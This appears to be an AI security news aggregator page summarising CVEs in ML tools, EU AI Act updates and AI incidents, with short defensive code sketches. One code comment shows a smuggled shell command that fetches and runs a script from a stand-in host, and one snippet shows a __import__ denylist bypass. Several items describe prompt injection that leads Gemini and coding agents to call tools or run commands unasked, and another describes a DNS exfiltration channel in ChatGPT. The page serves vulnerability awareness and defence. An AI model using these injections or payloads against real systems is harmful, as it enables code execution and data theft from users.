aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. This site is built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,677 · Last 24 hours: 23 · Last 7 days: 166
Daily Briefing: Monday, March 30, 2026

- Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.

- Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)
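The injection class behind CVE-2025-15379 is easy to reproduce in miniature. The following is a hypothetical sketch of the vulnerable pattern and a safer alternative, not MLflow's actual code; the function names and the allowlist regex are illustrative:

```python
import re
import subprocess

# Flaw class (illustrative): dependency strings taken from an attacker-
# controlled python_env.yaml are pasted into a single shell command string.
def install_insecure(deps):
    cmd = "pip install " + " ".join(deps)   # "numpy; curl evil.sh | sh" injects
    subprocess.run(cmd, shell=True)

# Safer sketch: validate each requirement against a conservative allowlist,
# then pass an argument list with shell=False so no shell parsing happens.
_REQ = re.compile(r"[A-Za-z0-9._\-\[\]=<>!~,]+")

def is_valid_requirement(dep: str) -> bool:
    # True only if the whole string consists of requirement-like characters.
    return bool(_REQ.fullmatch(dep))

def install_safer(deps):
    bad = [d for d in deps if not is_valid_requirement(d)]
    if bad:
        raise ValueError(f"rejected requirement(s): {bad}")
    subprocess.run(["pip", "install", *deps], shell=False, check=True)
```

Passing an argv list with `shell=False` means a payload like `numpy; rm -rf /` is at worst an invalid package name, never an executed command.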

Latest Intel

01

CVE-2024-2057: A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical.

security
Mar 1, 2024

A critical vulnerability was found in LangChain's langchain_community library version 0.0.26 in the TFIDFRetriever component (a tool that retrieves relevant documents for AI systems). The flaw allows server-side request forgery (SSRF, where an attacker tricks a server into making unwanted network requests on their behalf), and it can be exploited remotely.
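The exact sink inside TFIDFRetriever isn't shown here, but a generic SSRF guard illustrates the mitigation class: resolve a user-supplied URL's host and refuse private, loopback, or reserved addresses before the server fetches it. A minimal sketch (illustrative, not LangChain's patch):

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_url(url: str) -> bool:
    """Reject URLs that could steer the server at internal services."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        infos = socket.getaddrinfo(parsed.hostname, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        # Loopback, RFC 1918, link-local, and reserved ranges are off-limits.
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```

Note that a robust deployment also needs to pin the resolved address when making the request, since DNS rebinding can change the answer between check and fetch.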

Fix (CVE-2024-2057): Upgrading langchain_community to version 0.0.27 addresses this issue.

NVD/CVE Database

Critical This Week: 5 issues

- CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code. (NVD/CVE Database, Mar 30, 2026)

From the March 30, 2026 Daily Briefing:

- Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).

- ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.
02

AI Act Implementation: Timelines & Next Steps

policy
Feb 28, 2024

The EU AI Act is a regulatory framework that requires companies to comply with rules for different types of AI systems on specific timelines, starting with prohibitions on the riskiest AI uses within 6 months and expanding to cover high-risk AI systems (such as those used in law enforcement, hiring, or education) by 24 months after the law takes effect. The article outlines key compliance deadlines, secondary laws the EU Commission might create to clarify the rules, and guidance documents to help organizations understand how to follow the AI Act.

EU AI Act Updates
03

CVE-2024-25723: ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation.

security
Feb 27, 2024

ZenML Server in the ZenML machine learning package before version 0.46.7 has a remote privilege escalation vulnerability (CVE-2024-25723), meaning an attacker can gain higher-level access to the system from a distance. The flaw exists in a REST API endpoint (a web-based interface for requests) that activates user accounts, because it only requires a valid username and new password to change account settings, without proper access controls checking who should be allowed to do this.

Fix: Update ZenML to version 0.46.7 or use one of the patched versions: 0.44.4, 0.43.1, or 0.42.2.

NVD/CVE Database
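The flaw class in the ZenML issue, missing access control on an account-activation endpoint, can be sketched with an in-memory stand-in. The names and the token mechanism below are hypothetical, not ZenML's actual code:

```python
import secrets

# Illustrative in-memory user store.
USERS = {"alice": {"active": False, "password": None, "token": "s3rv3r-issued"}}

def activate_insecure(username: str, new_password: str) -> str:
    # Flaw class: nothing checks WHO is calling -- a valid username plus a
    # chosen password is enough to take over the account.
    user = USERS.get(username)
    if user is None:
        return "unknown user"
    user["password"] = new_password
    user["active"] = True
    return "activated"

def activate_secure(username: str, new_password: str, token: str) -> str:
    # Fix sketch: require a per-user, server-issued activation token,
    # compared in constant time to avoid timing leaks.
    user = USERS.get(username)
    if user is None or not secrets.compare_digest(token, user["token"]):
        return "forbidden"
    user["password"] = new_password
    user["active"] = True
    return "activated"
```

The design point is that possession of a public identifier (a username) must never substitute for proof of authorization.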
04

High-level summary of the AI Act

policy
Feb 27, 2024

The EU AI Act classifies AI systems by risk level, from prohibited (like social scoring systems that manipulate behavior) to minimal risk (unregulated). High-risk AI systems, such as those used in critical decisions affecting people's lives, face strict regulations requiring developers to provide documentation, conduct testing, and monitor for problems. General-purpose AI models (large language models that can do many tasks) have lighter requirements unless they present systemic risk, in which case developers must test them against adversarial attacks (attempts to trick or break them) and report serious incidents.

EU AI Act Updates
05

CVE-2024-27444: langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass a previous security fix.

security
Feb 26, 2024

CVE-2024-27444 is a vulnerability in LangChain Experimental (a Python library for building AI applications) before version 0.1.8 that allows attackers to bypass a previous security fix and run arbitrary code (malicious commands they choose) by using Python's special attributes like __import__ and __globals__, which were not blocked by the pal_chain/base.py security checks.

Fix: Update to LangChain version 0.1.8 or later. A patch is available at https://github.com/langchain-ai/langchain/commit/de9a6cdf163ed00adaf2e559203ed0a9ca2f1de7.

NVD/CVE Database
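Why dunder attributes defeat denylist filters can be shown with a toy checker. This is a deliberate simplification in the spirit of the bypassed check, not LangChain's actual pal_chain logic:

```python
# Toy denylist -- NOT LangChain's code.
BANNED = ("import ", "os.", "subprocess", "exec(", "eval(")

def looks_safe(code: str) -> bool:
    return not any(token in code for token in BANNED)

# Dunder-based payload: no banned token appears as a substring, yet the
# expression reaches __import__ and runs os.getcwd() anyway.
payload = "__import__('o' + 's').getcwd()"
assert looks_safe(payload)   # the denylist is fooled
cwd = eval(payload)          # arbitrary code executes regardless

# The durable fix is allowlisting: parse the code with the ast module and
# reject any node or attribute name not explicitly permitted -- including
# all dunder names like __import__ and __globals__.
```

String-matching denylists lose by construction, because Python offers many spellings for the same capability.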
06

CVE-2024-27133: Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset.

security
Feb 23, 2024

MLflow, a machine learning platform, has a vulnerability where it doesn't properly clean user input from dataset tables, allowing XSS (cross-site scripting, where attackers inject malicious code into web pages). When someone runs a recipe using an untrusted dataset in Jupyter Notebook, this can lead to RCE (remote code execution, where an attacker can run commands on the user's computer).

Fix: A patch is available at https://github.com/mlflow/mlflow/pull/10893

NVD/CVE Database
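The fix class for both MLflow XSS issues is output encoding. A minimal sketch, assuming cell values from an untrusted dataset are being rendered into HTML (the `render_cell` helper is illustrative, not MLflow's code):

```python
import html

def render_cell(value: str) -> str:
    # Escape untrusted text before embedding it in markup, so a payload like
    # <script>...</script> is displayed as inert text instead of executed.
    return f"<td>{html.escape(value)}</td>"
```

The same rule applies to template variables: encode at the point of output, for the specific context (HTML body, attribute, URL) the value lands in.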
07

CVE-2024-27132: Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe.

security
Feb 23, 2024

MLflow has a vulnerability (CVE-2024-27132) where template variables are not properly sanitized, allowing XSS (cross-site scripting, where malicious code runs in a user's browser) when running an untrusted recipe in Jupyter Notebook. This can lead to client-side RCE (remote code execution, where an attacker can run commands on the user's computer) through insufficient input cleaning.

NVD/CVE Database
08

CVE-2024-27319: Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read in the ONNX_ASSERT and ONNX_ASSERTM functions.

security
Feb 23, 2024

ONNX (a machine learning model format library) versions 1.15.0 and earlier have an out-of-bounds read vulnerability (accessing memory outside intended boundaries) caused by an off-by-one error in the ONNX_ASSERT and ONNX_ASSERTM functions, which handle string copying. This flaw could allow attackers to read sensitive data from memory.

NVD/CVE Database
09

CVE-2024-27318: Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal via the external_data field of tensor proto.

security
Feb 23, 2024

ONNX (a machine learning model format) versions 1.15.0 and earlier contain a directory traversal vulnerability (a security flaw where an attacker can access files outside the intended directory) in the external_data field of tensor proto (a data structure component). This vulnerability bypasses a previous security patch, allowing attackers to potentially access files they shouldn't be able to reach.

NVD/CVE Database
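The guard this bug class needs can be sketched in a few lines. This is illustrative of the mitigation, not the ONNX project's actual patch: resolve the external_data location and verify it stays under the model's directory.

```python
from pathlib import Path

def resolve_external_data(base_dir: str, location: str) -> Path:
    """Resolve an external_data path, refusing escapes from base_dir."""
    base = Path(base_dir).resolve()
    target = (base / location).resolve()
    # Rejects traversal payloads such as "../../etc/passwd" after symlink
    # and ".." resolution, not just by inspecting the raw string.
    if not target.is_relative_to(base):  # Python 3.9+
        raise ValueError(f"external_data escapes base dir: {location!r}")
    return target
```

Resolving before comparing matters: naive checks on the raw string (as earlier, bypassed patches in this class tend to do) miss `..` segments and symlinks.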
10

Google Gemini: Planting Instructions For Delayed Automatic Tool Invocation

security, safety
Feb 23, 2024

A researcher discovered a vulnerability in Google Gemini where attackers can hide instructions in emails that trick the AI into automatically calling external tools (called Extensions) without the user's knowledge. When a user asks the AI to analyze a malicious email, the AI follows the hidden instructions and invokes the tool, which is a form of request forgery (making unauthorized requests on behalf of the user).

Embrace The Red
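One mitigation class for delayed tool invocation is provenance tracking: tools are auto-executed only when every message in context came from a trusted channel, and anything triggered while untrusted content (an email, a web page, a retrieved document) is in scope requires user confirmation. A hypothetical sketch; the function and channel names are illustrative, not Gemini's API:

```python
def should_auto_invoke(requested_tool: str, context_sources: set) -> bool:
    # Auto-run a tool only if the conversation context contains nothing but
    # trusted channels; otherwise the call must be confirmed by the user.
    return context_sources <= {"user", "assistant"}

# A tool call made while a fetched email sits in context needs confirmation:
# should_auto_invoke("workspace.search", {"user", "assistant", "email"}) -> False
```

This doesn't stop the injected instructions from existing; it removes their ability to act silently, which is the dangerous step in the Gemini finding.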
Critical

- CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows; versions prior to 1.9.0 are affected. (NVD/CVE Database, Mar 27, 2026)

- Attackers exploit critical Langflow RCE within hours as CISA sounds alarm. (CSO Online, Mar 27, 2026)

- CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability. (CISA Known Exploited Vulnerabilities, Mar 26, 2026)

- CISA: New Langflow flaw actively exploited to hijack AI workflows. (BleepingComputer, Mar 26, 2026)